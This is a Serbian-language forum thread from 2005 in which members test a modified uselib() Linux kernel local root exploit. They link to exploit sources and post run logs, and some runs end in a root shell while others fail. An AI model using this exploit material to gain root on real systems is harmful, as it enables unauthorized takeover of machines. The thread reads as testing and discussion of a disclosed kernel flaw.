[es] - Modified uselib() local exploit

Shatterhand

Član broj: 42109
Poruke: 478
212.62.59.*

Profil

^{28.01.2005. u 17:16 - pre 234 meseci}

Citat:

Modified uselib() local exploit for the Linux kernel series. This version has been modified to also work on SMP kernels. Linux kernel versions 2.4 up to and including 2.4.29-pre3, 2.6 up to and including 2.6.10 are affected.

Kao shto sam i ocekivao, prva modifikovana verzija je izashla.
Evo testa na mom boxu (Slackware 10, kernel 2.4.26)

shatter@fearless:~$ ./uselib

[+] SLAB cleanup
child 1 VMAs 47017
[+] moved stack bfffe000, task_size=0xc0000000, map_base=0xbf800000
[+] vmalloc area 0xcfc00000 - 0xdf61f000
Wait... /
[+] race won maps=48908
expanded VMA (0xbfffc000-0xffffe000)
[!] try to exploit 0xd0acd000
[+] gate modified ( 0xffec9419 0x0804ec00 )
[+] exploited, uid=0

sh-2.05b#

Isti slucaj na josh jednom 2.4.26 (non patched).

http://www.packetstormsecurity.org/0501-exploits/uselib24.c

Odgovor na temu

axez

Član broj: 1021
Poruke: 1388
*.nat-pool.nsad.sbb.co.yu.

Profil

Re: Modified uselib() local exploit

^{28.01.2005. u 22:00 - pre 234 meseci}

Ne radi na 2.6 kernelu.

Odgovor na temu

EArthquake

Član broj: 20684
Poruke: 884
195.252.103.*

+67 Profil

Re: Modified uselib() local exploit

^{28.01.2005. u 22:11 - pre 234 meseci}

@axez
pise da radi samo na 2.4

@shatterhand
kolko je trebalo tebi da uradi race
kod mene je trajalo jedno 5 min i na kraju nije uspeo

earthquake@numenor:~/Downloads$ ./uselib24

[+] SLAB cleanup
child 1 VMAs 124
[+] moved stack bfffe000, task_size=0xc0000000, map_base=0xbf800000
[+] vmalloc area 0xd7c00000 - 0xef440000
Wait... |
[+] race won maps=221
expanded VMA (0xbfffc000-0xffffe000)
[-] FAILED: find LDT (Cannot allocate memory)
CRITICAL, entering endless loop

[1]+ Stopped(SIGSTOP) ./uselib24

Odgovor na temu

Shatterhand

Član broj: 42109
Poruke: 478
212.62.59.*

Profil

Re: Modified uselib() local exploit

^{29.01.2005. u 13:07 - pre 234 meseci}

Probao sam nekoliko puta na svom da vidim kakve rezultate daje.
Obicno uspeshno sploita nakon par sekundi ali ponekad kad je load veci od 1.5
[-] FAILED: try again (Cannot allocate memory)
load average: 2.97, 1.07, 0.44.
Testirao sam na josh par 2.4.x kernela i radio je nakon 2-3 pokushaja.
I dalje jede ram... ;)

Earth, sto se tebe tiche nije mi najbolje jasan slucaj jer koliko se ja secam
tvoj slack 10 je takodje na 2.4.26 (ne patchovan) tako da je exploitable..

Odgovor na temu

_owl_

Član broj: 318
Poruke: 1043
*.vdial.verat.net.

+3 Profil

Re: Modified uselib() local exploit

^{29.01.2005. u 15:25 - pre 234 meseci}

Kod mene izgleda nesto i neradi:

Code:

child 1 VMAs 0
[+] moved stack bfffe000, task_size=0xc0000000, map_base=0xbf800000
[+] vmalloc area 0xc7c00000 - 0xcf7ad000
Wait... /

I ovako mogu da cekam u nedogled.
Sistem je Slackware 9.1

Code:

owl@plamicak:~$ uname -a
Linux plamicak 2.4.22 #1 SMP Thu Apr 1 13:24:31 CEST 2004 i686 unknown unknown GNU/Linux

Owl

Odgovor na temu

Shatterhand

Član broj: 42109
Poruke: 478
212.62.59.*

Profil

Re: Modified uselib() local exploit

^{29.01.2005. u 16:50 - pre 234 meseci}

Citat:

owl@plamicak:~$ uname -a
Linux plamicak 2.4.22 #1 SMP Thu Apr 1 13:24:31 CEST 2004 i686 unknown unknown GNU/Linux

"It should be also works on 2.4 SMP, but not easy. " ;)

Ako ne sa ovim, tvoj kernel je podlozhan sploitanju expand_stack SMP race
http://www.packetstormsecurity.org/0501-exploits/stackgrow2.c (PoC)

Sve u svemu, uselib() sploit je radio na vecini kernela sto sam ja probao
za razliku od prethodne verzije. Mislim da ce se razne verzije vrteti oko
uselib() kao nekad oko do_brk.

Odgovor na temu

littleboy
/home/sasa

Član broj: 14387
Poruke: 514
*.teol.net.

ICQ: 46124351
Sajt: littleboy.geek.rs.ba

Profil

Re: Modified uselib() local exploit

^{29.01.2005. u 17:04 - pre 234 meseci}

sasa@s1(/tmp)$ ./a.out

[+] SLAB cleanup
child 1 VMAs 622
[+] moved stack bfffe000, task_size=0xc0000000, map_base=0xbf800000
[+] vmalloc area 0xc0400000 - 0xc047e465
Wait... |--> prepare_slab(), 255Mb

[-] FAILED: try again
Killed
sasa@s1(/tmp)$ uname -a
Linux s1 2.4.25-grsec #2 Mon Apr 5 14:46:51 CEST 2004 i686 i686 i386 GNU/Linux
sasa@(/tmp)$

Fino.

\x47 \x6f \x64 \x20 \x6d \x61 \x64 \x65 \x20 \x70 \x6f \x74 \x2e \x20 \x4d
\x61 \x6e \x20 \x6d \x61 \x64 \x65 \x20 \x62 \x65
\x65 \x72 \x2e \x20 \x57 \x68 \x6f \x20 \x64 \x6f \x20 \x79 \x6f \x75 \x20
\x74 \x72 \x75 \x73 \x74 \x20 \x3f

Odgovor na temu

Mitrović Srđan
bloodzero
Freelance
Majur //: Šabac

Član broj: 10261
Poruke: 2800
*.gromnet.net.

Sajt: freeshell-reviews.com

+4 Profil

Re: Modified uselib() local exploit

^{29.01.2005. u 17:09 - pre 234 meseci}

Code:
bash-2.05b$ ./uselib24

[+] SLAB cleanup
    child 1 VMAs 2134
[+] moved stack bfffe000, task_size=0xc0000000, map_base=0xbf800000
[+] vmalloc area 0xdf800000 - 0xfef5d000
    Wait... \
[+] race won maps=55328
    expanded VMA (0xbfffc000-0xffffe000)
[!] try to exploit 0xe205c000
[+] gate modified ( 0xffec9419 0x0804ec00 )
[+] exploited, uid=0

sh-2.05b# id
uid=0(root) gid=0(root)
groups=102(h4x0rz),11(floppy),17(audio),18(video),19(cdrom)

Code:
sh-2.05b# uname -a
Linux digital-phear 2.4.26 #6 Mon Jun 14 19:07:27 PDT 2004 i686 unknown unknown GNU/Linux

Tony Melendez:
http://video.google.com/videoplay?docid=-
3819862628517136815&q=tony+melendez

NIKADA NE UZIMATI HOSTING NA GO DADDY!

Odgovor na temu

weB_KiLeR

Član broj: 238
Poruke: 1317
*.tehnicom.net.

Profil

Re: Modified uselib() local exploit

^{30.01.2005. u 08:14 - pre 234 meseci}

Code:

Mil0s@coders:~$ ./elflbl

child 1 VMAs 0
[+] moved stack bfffe000, task_size=0xc0000000, map_base=0xbf800000
[+] vmalloc area 0xc5000000 - 0xc9c16000
[-] FAILED: open lib (/dev/shm/_elf_lib not writable?) (Permission denied)
Killed

Linux majka ;)

Odgovor na temu

Shatterhand

Član broj: 42109
Poruke: 478
212.62.59.*

Profil

Re: Modified uselib() local exploit

^{30.01.2005. u 20:20 - pre 234 meseci}

Code:
[-] FAILED: open lib (/dev/shm/_elf_lib not writable?) (Permission denied)

Milose, sta si ti to probao, ja pricam o novoj verziji uselib() exploita gde je
koliko se secam /dev/shm izostavljeno tj. zamenjeno sa writeable:

Code:
#define LIBNAME "/tmp/_elf_lib"

Odgovor na temu